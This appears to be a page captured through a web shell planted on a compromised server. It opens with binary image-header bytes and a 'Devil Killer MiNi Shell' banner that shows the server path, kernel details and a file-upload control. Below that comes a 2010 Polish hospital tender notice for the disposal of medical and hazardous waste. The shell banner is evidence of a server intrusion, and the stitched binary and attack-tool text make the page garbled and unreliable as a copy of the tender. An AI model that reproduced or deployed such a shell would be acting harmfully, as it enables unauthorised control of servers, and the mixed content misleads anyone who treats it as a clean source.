JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/320434-N-2010.html

<p class="kh_header"><b>Radom: Świadczenie usług w zakresie odbioru i unieszkodliwienia odpadów niebezpiecznych i innych niż niebezpieczne wytworzonych w Radomskim Szpitalu Specjalistycznym.</b><br>
<b>Numer ogłoszenia: 320434 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbioru i unieszkodliwienia odpadów niebezpiecznych i innych niż niebezpieczne wytworzonych w Radomskim Szpitalu Specjalistycznym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 - odpady z grupy 18
Lp.	Nazwa odpadu	j.m.	Orientacyjna ilość odpadów wytworzonych w okresie 36 miesięcy
1.		inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału 
18 01 03	kg	198 600
2.		części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania
18 01 02	kg	3 600
3.		pozostałości z żywienia pacjentów oddziałów zakaźnych
18 01 82	kg	1500
4.		leki inne niż wymienione w 180108
18 01 09	kg	300
5.		chemikalia w tym odczynniki chemiczne,  zawierające substancje niebezpieczne
18 01 06	kg	1 800
6.		chemikalia w tym odczynniki chemiczne, inne niż wymienione w 18 01 06
18 01 07	
kg
	1 500
7.		narzędzia chirurgiczne i zabiegowe
18 01 01	kg	300
1.	Podane ilości odpadów są orientacyjne, i mogą się różnić w zależności od ilości hospitalizowanych pacjentów, wielkości kontraktu na świadczenie usług medycznych itp.
2.	Wykonawca będzie odbierać odpady własnym transportem - 3 razy w tygodniu lub na każde pisemne zgłoszenie (w przypadku tych zgłoszeń czas realizacji nie dłuższy niż 24 godziny od daty pisemnego zgłoszenia).
3.	Pojazdy Wykonawcy przeznaczone do realizacji zamówienia muszą być przystosowane do przewozu odpadów będących przedmiotem umowy. 
4.	Za transport i rozładunek odpadów odpowiedzialność ponosi Wykonawca, za załadunek w szpitalu - Zamawiający.
5.	Odpady o kodzie 18 01 03, 18 01 09 będą gromadzone w workach foliowych, (barwie właściwej dla rodzaju odpadu) i w takim stanie przekazywane do unieszkodliwienia. Worki foliowe oraz słoiki zapewnia Zamawiający. Odpady o kodzie 180102, 180182 będą gromadzone w pojemnikach, wykonanych z materiału ulegającego rozkładowi w procesie  termicznego unieszkodliwiania, i w takim stanie przekazywane do unieszkodliwienia. Pojemniki ma dostarczać każdorazowo Wykonawca, w ilości i wielkości uzgodnionej z upoważnionym przedstawicielem Zamawiającego.  
Miesięczne zapotrzebowanie na pojemniki do gromadzenia niżej wymienionych odpadów:
-	odpady o kodzie 18 01 02 - pojemniki z pokrywą o poj. 8-10 litrów, ok. 10 szt./miesiąc,
-	odpady o kodzie 18 01 82 -  pojemniki z pokrywą o poj. 8-10 litrów, ok.4 szt./miesiąc,
6.	Odpady o kodach 18 01 06 i 18 01 07, gromadzone będą w opakowaniach, których rodzaj, wielkość itp. będzie uzależniona od ich właściwości fizycznych. Opakowania te zapewnia Zamawiający. 
7.	Wykonawca musi posiadać wagę do określania faktycznej masy odbieranych odpadów. Czynności te odbywać będą się w siedzibie Zamawiającego, w obecności upoważnionego przedstawiciela Wykonawcy i Zamawiającego. 
Fakt odbioru odpadów, ich masy oraz kodu będzie potwierdzony w karcie przekazania odpadów.
8.	Usługa w zakresie zbierania, transportu i unieszkodliwiania odpadów medycznych musi być wykonana zgodnie z przepisami ustawy z dnia 27 kwietnia 2001 roku o odpadach (tekst jedn. z 2007 roku Dz.U. Nr 39 poz. 251 z poź. zmianami) oraz Rozporządzeniem Ministra Środowiska z dnia 27.09.2001 r. w sprawie katalogu odpadów (Dz. U. Nr 112 poz.1206) i Rozporządzeniem Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz. U. Nr 139  poz. 940).
Część nr 2 - odpady z grupy 15,16,19
Lp.	Nazwa odpadu	j.m.	Orientacyjna ilość odpadów wytworzonych w okresie 36 miesięcy
1.		sorbenty, materiały filtracyjne, tkaniny do wycierania i ubrania ochronne inne niż wymienione w 150202 
15 02 03	kg	4710
2.		produkty spożywcze
przeterminowane lub nieprzydatne do spożycia 
16 03 80	kg	21 000
3.		zużyte urządzenia zawierające niebezpieczne elementy inne niż wymienione w 160209 do 160212  
16 02 13 (termometry rtęciowe)	szt.	150
4.		skratki
19 08 01	kg	     3600

1.	Podane ilości odpadów są orientacyjne, i mogą się różnić w zależności od ilości hospitalizowanych pacjentów, wielkości kontraktu na świadczenie usług medycznych itp.
2.	Wykonawca będzie odbierać odpady własnym transportem - 1 raz w tygodniu lub na każde pisemne zgłoszenie (w przypadku tych zgłoszeń czas realizacji nie dłuższy niż 24 godziny od daty pisemnego zgłoszenia).
3.	Pojazdy Wykonawcy przeznaczone do realizacji zamówienia muszą być przystosowane do przewozu odpadów będących przedmiotem umowy. 
4.	Za transport i rozładunek odpadów odpowiedzialność ponosi Wykonawca, za załadunek w szpitalu - Zamawiający.
5.	Odpady o kodzie 15 02 03 będą gromadzone w workach foliowych, (barwie właściwej dla rodzaju odpadu) i w takim stanie przekazywane do unieszkodliwienia. Odpady o kodzie 16 02 13 będą gromadzone w słoikach szklanych, zanurzone w wodzie i w takim stanie przekazywane do unieszkodliwienia. Worki foliowe oraz słoiki zapewnia Zamawiający. Odpady o kodzie 160380 będą gromadzone w pojemnikach, wykonanych z materiału ulegającego rozkładowi w procesie  termicznego unieszkodliwiania, i w takim stanie przekazywane do unieszkodliwienia. Pojemniki ma dostarczać każdorazowo Wykonawca, w ilości i wielkości uzgodnionej z upoważnionym przedstawicielem Zamawiającego.  
Miesięczne zapotrzebowanie na pojemniki do gromadzenia niżej wymienionych odpadów:
-	odpady o kodzie 16 03 80 -  pojemniki z pokrywą o poj.50 litrów , ok.5-6 szt./miesiąc.
6.	Wykonawca musi posiadać wagę do określania faktycznej masy odbieranych odpadów. Czynności te odbywać będą się w siedzibie Zamawiającego, w obecności upoważnionego przedstawiciela Wykonawcy i Zamawiającego. 
Fakt odbioru odpadów, ich masy oraz kodu będzie potwierdzony w karcie przekazania odpadów.
7.	Usługa w zakresie zbierania, transportu i unieszkodliwiania odpadów medycznych musi być wykonana zgodnie z przepisami ustawy z dnia 27 kwietnia 2001 roku o odpadach (tekst jedn. z 2007 roku Dz.U. Nr 39 poz. 251 z poź. zmianami) oraz Rozporządzeniem Ministra Środowiska z dnia 27.09.2001 r. w sprawie katalogu odpadów (Dz. U. Nr 112 poz.1206) i Rozporządzeniem Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz. U. Nr 139  poz. 940)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.50.00.00-2, 90.52.44.00-0, 09.52.42.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie Wadium w kwocie: 
Część nr 1 - 7.099,00 PLN (słownie: siedem tysięcy dziewięćdziesiąt dziewięć złotych).
Część nr 2 -     931,00 PLN (słownie: dziewięćset trzydzieści jeden złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada uprawnienia do wykonywania określonej działalności, jeżeli wykaże, że posiada zezwolenie (decyzję) na zbieranie, transport 
i unieszkodliwienie odpadów będących przedmiotem zamówienia zgodnie z ustawą z dnia 27.04.2001r. o odpadach (tj. Dz. U. z 2007 r. nr 39, poz. 251 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał usługi związaną z przedmiotem zamówienia na kwotę:
Część nr 1 -  min. 100.000,00 zł.
Część nr 2 - min.   15.000,00 zł.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do reprezentowania, jeżeli ofertę składa pełnomocnik	2.Dokument potwierdzający wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>23.	Zamawiający ustala następujące możliwości zmiany umowy:
23.1.	Oferowane przez Wykonawcę ceny jednostkowe brutto mogą ulec zmianie po roku obowiązywania umowy tylko wskaźnik waloryzacji cen towarów i usług konsumpcyjnych ogłoszony przez Prezesa GUS za ostatni kwartał przed upływem danego roku obowiązywania umowy. Zmiana cen nie częściej niż raz na rok.
23.2.	Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian. 
23.3.	Zamawiający dopuszcza wydłużenie terminu realizacji umowy (o 1 rok) - 
w przypadku niewykorzystania wartości umowy. 
23.4.	Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-600 Radom ul. Lekarska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2010 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia/III piętro pok. 308/
26-600 Radom ul. Lekarska 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> odpady z grupy 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa odpadu	j.m.	Orientacyjna ilość odpadów wytworzonych w okresie 36 miesięcy
1.		inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału
18 01 03	kg	198 600
2.		części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania
18 01 02	kg	3 600
3.		pozostałości z żywienia pacjentów oddziałów zakaźnych
18 01 82	kg	1500
4.		leki inne niż wymienione w 180108
18 01 09	kg	300
5.		chemikalia w tym odczynniki chemiczne,  zawierające substancje niebezpieczne
18 01 06	kg	1 800
6.		chemikalia w tym odczynniki chemiczne, inne niż wymienione w 18 01 06
18 01 07	
kg
	1 500
7.		narzędzia chirurgiczne i zabiegowe
18 01 01	kg	300
1.	Podane ilości odpadów są orientacyjne, i mogą się różnić w zależności od ilości hospitalizowanych pacjentów, wielkości kontraktu na świadczenie usług medycznych itp.
2.	Wykonawca będzie odbierać odpady własnym transportem - 3 razy w tygodniu lub na każde pisemne zgłoszenie (w przypadku tych zgłoszeń czas realizacji nie dłuższy niż 24 godziny od daty pisemnego zgłoszenia).
3.	Pojazdy Wykonawcy przeznaczone do realizacji zamówienia muszą być przystosowane do przewozu odpadów będących przedmiotem umowy. 
4.	Za transport i rozładunek odpadów odpowiedzialność ponosi Wykonawca, za załadunek w szpitalu - Zamawiający.
5.	Odpady o kodzie 18 01 03, 18 01 09 będą gromadzone w workach foliowych, (barwie właściwej dla rodzaju odpadu) i w takim stanie przekazywane do unieszkodliwienia. Worki foliowe oraz słoiki zapewnia Zamawiający. Odpady o kodzie 180102, 180182 będą gromadzone w pojemnikach, wykonanych z materiału ulegającego rozkładowi w procesie  termicznego unieszkodliwiania, i w takim stanie przekazywane do unieszkodliwienia. Pojemniki ma dostarczać każdorazowo Wykonawca, w ilości i wielkości uzgodnionej z upoważnionym przedstawicielem Zamawiającego.  
Miesięczne zapotrzebowanie na pojemniki do gromadzenia niżej wymienionych odpadów:
-	odpady o kodzie 18 01 02 - pojemniki z pokrywą o poj. 8-10 litrów, ok. 10 szt./miesiąc,
-	odpady o kodzie 18 01 82 -  pojemniki z pokrywą o poj. 8-10 litrów, ok.4 szt./miesiąc,
6.	Odpady o kodach 18 01 06 i 18 01 07, gromadzone będą w opakowaniach, których rodzaj, wielkość itp. będzie uzależniona od ich właściwości fizycznych. Opakowania te zapewnia Zamawiający. 
7.	Wykonawca musi posiadać wagę do określania faktycznej masy odbieranych odpadów. Czynności te odbywać będą się w siedzibie Zamawiającego, w obecności upoważnionego przedstawiciela Wykonawcy i Zamawiającego. 
Fakt odbioru odpadów, ich masy oraz kodu będzie potwierdzony w karcie przekazania odpadów.
8.	Usługa w zakresie zbierania, transportu i unieszkodliwiania odpadów medycznych musi być wykonana zgodnie z przepisami ustawy z dnia 27 kwietnia 2001 roku o odpadach (tekst jedn. z 2007 roku Dz.U. Nr 39 poz. 251 z poź. zmianami) oraz Rozporządzeniem Ministra Środowiska z dnia 27.09.2001 r. w sprawie katalogu odpadów (Dz. U. Nr 112 poz.1206) i Rozporządzeniem Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz. U. Nr 139  poz. 940.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.50.00.00-2, 90.52.44.00-0, 90.52.42.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odpady z grupy 15,16,19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa odpadu	j.m.	Orientacyjna ilość odpadów wytworzonych w okresie 36 miesięcy
1.		sorbenty, materiały filtracyjne, tkaniny do wycierania i ubrania ochronne inne niż wymienione w 150202 
15 02 03	kg	4710
2.		produkty spożywcze
przeterminowane lub nieprzydatne do spożycia 
16 03 80	kg	21 000
3.		zużyte urządzenia zawierające niebezpieczne elementy inne niż wymienione w 160209 do 160212  
16 02 13 (termometry rtęciowe)	szt.	150
4.		skratki
19 08 01	kg	     3600

1.	Podane ilości odpadów są orientacyjne, i mogą się różnić w zależności od ilości hospitalizowanych pacjentów, wielkości kontraktu na świadczenie usług medycznych itp.
2.	Wykonawca będzie odbierać odpady własnym transportem - 1 raz w tygodniu lub na każde pisemne zgłoszenie (w przypadku tych zgłoszeń czas realizacji nie dłuższy niż 24 godziny od daty pisemnego zgłoszenia).
3.	Pojazdy Wykonawcy przeznaczone do realizacji zamówienia muszą być przystosowane do przewozu odpadów będących przedmiotem umowy. 
4.	Za transport i rozładunek odpadów odpowiedzialność ponosi Wykonawca, za załadunek w szpitalu - Zamawiający.
5.	Odpady o kodzie 15 02 03 będą gromadzone w workach foliowych, (barwie właściwej dla rodzaju odpadu) i w takim stanie przekazywane do unieszkodliwienia. Odpady o kodzie 16 02 13 będą gromadzone w słoikach szklanych, zanurzone w wodzie i w takim stanie przekazywane do unieszkodliwienia. Worki foliowe oraz słoiki zapewnia Zamawiający. Odpady o kodzie 160380 będą gromadzone w pojemnikach, wykonanych z materiału ulegającego rozkładowi w procesie  termicznego unieszkodliwiania, i w takim stanie przekazywane do unieszkodliwienia. Pojemniki ma dostarczać każdorazowo Wykonawca, w ilości i wielkości uzgodnionej z upoważnionym przedstawicielem Zamawiającego.  
Miesięczne zapotrzebowanie na pojemniki do gromadzenia niżej wymienionych odpadów:
-	odpady o kodzie 16 03 80 -  pojemniki z pokrywą o poj.50 litrów , ok.5-6 szt./miesiąc.
6.	Wykonawca musi posiadać wagę do określania faktycznej masy odbieranych odpadów. Czynności te odbywać będą się w siedzibie Zamawiającego, w obecności upoważnionego przedstawiciela Wykonawcy i Zamawiającego. 
Fakt odbioru odpadów, ich masy oraz kodu będzie potwierdzony w karcie przekazania odpadów.
